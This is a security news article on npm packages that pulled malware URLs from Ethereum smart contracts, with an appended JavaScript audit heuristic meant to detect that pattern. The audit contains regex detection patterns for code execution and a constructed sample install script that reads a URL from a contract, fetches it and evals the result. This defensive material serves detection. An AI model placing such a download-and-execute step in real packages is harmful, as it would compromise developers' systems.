Hackers Exploit Ethereum Smart Contracts
Hackers have discovered a novel method of concealing malware inside Ethereum smart contracts, allowing them to bypass traditional security scans and deploy hidden threats through open-source repositories.
Researchers at cybersecurity and digital asset compliance firm ReversingLabs recently uncovered two malicious Node Package Manager (NPM) packages—“colortoolsv2” and “mimelib2.” These packages did not directly host malware but instead leveraged Ethereum smart contracts to fetch command-and-control server addresses that delivered second-stage malware.
This new approach complicates detection efforts, as blockchain traffic typically appears legitimate. Instead of triggering alarms by connecting to suspicious URLs, the malware leveraged Ethereum’s decentralized nature as a trusted medium for communication, making malicious activity significantly harder to track.
ReversingLabs researcher Lucija Valentić explained that while malware has previously targeted Ethereum smart contracts, this particular method—using them to host URLs for malicious commands—marks a significant evolution in hacker evasion tactics.
Malware Hidden Inside NPM Packages
The two compromised NPM packages published in July initially appeared to be harmless utilities. However, they contained downloader functions that interacted with Ethereum smart contracts.
Instead of embedding malicious links directly, the packages queried Ethereum contracts for URLs. These URLs then delivered the second-stage malware payload, enabling the attackers to maintain persistence and execute harmful actions on infected systems.
This technique effectively sidesteps static security analysis since the malicious URLs are not stored in the packages themselves. Security tools scanning package repositories cannot flag anything suspicious until the package interacts with the blockchain to retrieve commands.
Such methods highlight a growing trend in the open-source ecosystem, where malicious actors exploit trust in public repositories like NPM and GitHub to deliver sophisticated attacks.
A Larger Deception Campaign Uncovered
According to ReversingLabs, the malicious packages were part of an elaborate social engineering campaign. Threat actors constructed fake cryptocurrency trading bot repositories to lure developers and crypto enthusiasts.
These repositories appeared highly legitimate due to:
- Fabricated commits simulating long-term activity.
- Multiple fake maintainer accounts giving an impression of active collaboration.
- Fake GitHub accounts that “starred” and followed the repositories for credibility.
- Professional project descriptions and documentation designed to build trust.
Such deception strategies were effective in drawing unsuspecting developers, who unknowingly integrated the compromised packages into their projects. This demonstrates how cybercriminals increasingly blend technical innovation with social engineering to execute malware campaigns.
This approach has striking similarities to prior attacks. For example, the Lazarus Group, a North Korea-linked hacking collective, was previously linked to malware concealed in Ethereum contracts earlier in 2024. However, the new method of hiding malicious URLs within contracts represents an escalation in complexity and stealth.
Evolution Of Open-Source Attacks
The rise of attacks targeting open-source repositories is not isolated. Security researchers documented 23 crypto-related malicious campaigns in 2024 alone, proving the growing attractiveness of open-source ecosystems for cybercriminals.
Notably:
- In April, a fake Solana trading bot repository on GitHub distributed malware that stole crypto wallet credentials.
- Another campaign targeted Bitcoinlib, an open-source Python library, inserting obscured malware to compromise developer systems.
These incidents reflect a wider trend of repository-based attacks, blending blockchain tools, cryptocurrency themes, and sophisticated social engineering to evade detection.
By using Ethereum smart contracts as intermediaries, hackers gain several advantages:
- Anonymity and persistence — blockchain content cannot easily be deleted or censored.
- Legitimacy masking — blockchain queries look like standard developer or trading activities.
- Dynamic malware delivery — malicious payloads can be updated without changing the NPM package itself.
Such tactics underscore the urgent need for stronger vetting mechanisms in open-source repositories, as well as heightened awareness among developers integrating third-party packages.
Defending Against Emerging Threats
This latest discovery reinforces that malware targeting Ethereum smart contracts is no longer hypothetical—it is an evolving reality. The blending of blockchain technology with traditional malware delivery tactics creates a hybrid threat landscape that security researchers and developers must urgently address.
To mitigate these risks, cybersecurity experts recommend:
- Verifying package sources before installation.
- Auditing code repositories for suspicious dependencies.
- Monitoring blockchain interactions in applications for anomalies.
- Collaborating across the developer community to flag and remove compromised packages quickly.
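As an added example (not code from the article or from ReversingLabs), the heuristic audit below implements the "auditing code repositories" and "monitoring blockchain interactions" recommendations for the downloader pattern described above: the malicious URL is never stored in the package, but the code that reads it from a contract, fetches it and runs the result is, and that combination is what the check flags. The package names, file contents and the ADDR/ABI/provider placeholders in the samples are constructed for illustration.

```javascript
// Heuristic audit of an npm package for the "chain read -> fetch -> execute"
// downloader shape described in the article. Sample packages are constructed
// for illustration and are not the real colortoolsv2 / mimelib2 code.
const INDICATORS = {
  // reads a value from an Ethereum contract (ethers/web3 import or raw JSON-RPC)
  chainRead: [/\beth_call\b/, /require\(\s*['"](ethers|web3)['"]\s*\)/, /from\s+['"](ethers|web3)['"]/],
  // fetches something over HTTP at run time
  fetch: [/\bfetch\s*\(/, /\baxios\.(get|post)\s*\(/, /\bhttps?\.get\s*\(/],
  // turns fetched data into running code
  exec: [/\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bexecSync\s*\(/, /\bspawn\s*\(/],
};

// pkg = { manifest: <parsed package.json>, files: { "<path>": "<source text>" } }
function auditPackage(pkg) {
  const findings = [];
  // Lifecycle hooks run automatically on `npm install`, so they are reviewed first.
  const scripts = pkg.manifest.scripts || {};
  for (const hook of ["preinstall", "install", "postinstall"]) {
    if (scripts[hook]) findings.push(`lifecycle hook ${hook}: ${scripts[hook]}`);
  }
  const hits = {};
  for (const [path, src] of Object.entries(pkg.files)) {
    for (const [kind, patterns] of Object.entries(INDICATORS)) {
      if (patterns.some((re) => re.test(src))) (hits[kind] = hits[kind] || []).push(path);
    }
  }
  for (const [kind, paths] of Object.entries(hits)) findings.push(`${kind}: ${paths.join(", ")}`);
  // All three stages present is the downloader shape; a contract read alone in a
  // colour or MIME helper is still odd enough to deserve a manual look.
  const stages = Object.keys(hits).length;
  const risk = stages === 3 ? "high" : hits.chainRead ? "medium" : "low";
  return { risk, findings };
}

// Constructed sample: a "colour utility" whose postinstall step reads a string
// from a contract, downloads whatever it points at and executes it.
const suspicious = {
  manifest: { name: "example-colour-utils", scripts: { postinstall: "node setup.js" } },
  files: {
    "index.js": "module.exports = { hex: (r, g, b) => '#' + [r, g, b].map((x) => x.toString(16)).join('') };",
    "setup.js": "const { ethers } = require('ethers');\n" +
      "const c = new ethers.Contract(ADDR, ABI, provider); // ADDR/ABI/provider: placeholders\n" +
      "c.get().then((url) => fetch(url)).then((r) => r.text()).then((src) => eval(src));",
  },
};
// Constructed benign sample: the same utility with no install hook, chain or network access.
const benign = { manifest: { name: "colour-utils" }, files: { "index.js": suspicious.files["index.js"] } };

console.log(auditPackage(suspicious)); // risk "high"
console.log(auditPackage(benign));     // risk "low"
```

The regex list is a starting point for triage, not a complete detector; the point is that a dependency whose stated purpose has nothing to do with blockchains should never need to read a contract, let alone run what it downloads.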
The ReversingLabs discovery is a reminder that as blockchain adoption grows, malicious actors will continue innovating, finding new ways to exploit trust, decentralization, and the open-source ethos for their gain.
As Valentić concluded, the technique highlights the fast evolution of detection evasion strategies, and shows that “attacks on repositories are evolving” with more sophisticated blends of blockchain exploitation and social engineering campaigns.